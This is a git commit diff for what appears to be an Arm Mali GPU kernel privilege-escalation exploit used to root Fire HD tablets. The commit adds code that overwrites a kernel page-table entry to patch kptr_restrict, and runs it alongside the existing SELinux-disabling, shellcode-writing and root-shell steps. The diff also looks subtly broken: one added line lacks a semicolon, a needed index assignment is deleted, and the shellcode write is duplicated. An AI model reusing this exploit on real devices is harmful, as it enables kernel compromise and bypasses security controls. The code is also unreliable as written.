kallsyms をデバイスから抽出できる状態にする

https://xdaforums.com/t/potential-arm-mali-gpu-based-root-firehd-8th-12th-gen-affected.4574635/post-89498086 Signed-off-by: yuu <[email protected]>
SmileTabLabo · May 9, 2024 · 38c4ec6 · 38c4ec6
1 parent 57aac97
commit 38c4ec6
Showing 1 changed file with 27 additions and 7 deletions.
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
@@ -80,12 +80,13 @@
 // avc_denied.isra.4
 #define AVC_DENY_neo \
   0x35acc8  // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
-
+#define KPTR_RESTRICT \
+  0x1147178 // どうやって求めたのか不明（ghidraで調べた？）
 static uint64_t sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo;
 static uint64_t sel_read_enforce = SEL_READ_ENFORCE_neo;
 static uint64_t selinux_enforcing = SELINUX_ENFORCING_neo;
-// added
 static uint64_t avc_deny = AVC_DENY_neo;
+static uint64_t kptr_restrict = 0x1147178
 static uint64_t selinux_enforcing_READ = 0X0;
 static uint64_t selinux_enforcing_WRITE = 0X0;
 /*
@@ -418,12 +419,9 @@ int find_freed_idx(int mali_fd) {
       err(1, "mem query error in find_freed_idx %d\n", j);
     }
     if (query.out.value != SPRAY_PAGES) {
-#if defined(__aarch64__)
-      LOG("jit_free commit: %d %lu\n", j, query.out.value);
-#else
+
       LOG("jit_free commit: %d %llu\n", j, query.out.value);
-      freed_idx = j;
-#endif
+
     }
   }
   return freed_idx;
@@ -462,7 +460,20 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
   adpr |= (immhi_mask & (immhi << 5));
   return adpr;
 }
+void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd,
+                   uint64_t* reserved) {
+  uint64_t kptr_restrict_addr =
+      (((kptr_restrict + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t),
+           kptr_restrict_addr, atom_number++,
+           MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
+  usleep(300000);
+  // shellcode
+  write_data(mali_fd2, kptr_restrict, reserved,
+             TOTAL_RESERVED_SIZE / RESERVED_SIZE, 0,
+             MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+}
 void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred,
                       uint64_t read_enforce, uint32_t add_init,
                       uint32_t add_commit) {
@@ -844,6 +855,15 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
 #endif
       atom_number++;
       write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
+	  //added
+      usleep(100000);
+      write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
+      usleep(100000);
+      write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+      //added
+
+
+
       usleep(100000);
       write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
       usleep(100000);